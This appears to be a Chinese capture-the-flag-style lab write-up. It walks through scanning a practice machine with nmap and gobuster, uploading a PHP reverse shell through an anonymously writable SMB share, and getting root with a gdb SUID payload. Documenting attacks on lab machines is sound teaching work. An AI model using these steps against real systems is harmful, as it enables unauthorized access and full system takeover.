文章目录
信息收集
先来扫网段
nmap -sP 192.168.2.0/24
继续扫端口等信息
nmap -sC -sV -p- 192.168.2.10
扫到了SSH,HTTP和SMB
还是先来看看web服务,又是经典的默认页面
那么接着扫一下目录看看有没有什么发现
gobuster dir -w directory-list-2.3-medium.txt -u http://192.168.2.10/ -x txt,html,zip,php
没扫到什么东西,那就应该是直接从SMB突破了
首先枚举以下SMB上的文件共享情况,这里使用到smbmap这个工具,我们发现了有一个叫share的文件夹是可以共享的
smbmap -H 192.168.2.10 #H是指定host
漏洞利用
尝试连接一下这个share文件夹
smbclient \\\\192.168.2.10\\share -N
连接成功,并且这个文件夹下面有一个html文件,这个很有可能就是我们访问主页看到的那个index.html
我把index.html get到本地之后查看,从这个html文件的特征我们就能发现,这个就是我们访问主页的那个index.html,那么如果我们能穿一个马到这个共享文件夹上,也就意味着我们能够拿到webshell了
我直接上传了一个反弹shell的php上去
put 100.php
当我访问这个100.php的时候就成功反弹shell了
看了一波目录,在/var/backups目录下发现了passwd与shadow的备份文件,可以尝试爆破一下,先把文件下载到本地,下载的时候发现没权限,是我草率了···
权限提升
那就只能尝试别的方法了,看一手SUID
find / -user root -perm -4000 -print 2>/dev/null
发现了一个宝贝,根据用法构造下面的payload
gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", "-p")' -ex quit
提权成功,一步到位
总结
总结:这套靶机算得上是很简单了,没有什么弯弯绕绕的地方,SMB上传webshell,然后发现gdb提权,一步到位。
小心思:球球各位给个三连吧!😉 会点赞关注收藏的大帅哥大漂亮们也许已经够帅气和美丽了,但是根据科学研究调查发现,给博主三连能让各位颜值更上一层楼,祝各位祝财源广进,进德修业,业精于勤,勤而补拙,卓尔不群,群英荟萃,摧枯拉朽,朽木生花,花辰月夕,夕寐宵兴,兴旺发达,达士通人,人定胜天!
你们的支持就是继续创作的最好动力~博主会继续坚持更新,保证让最简单普通的语言把每个知识点讲清楚,大家一起进步!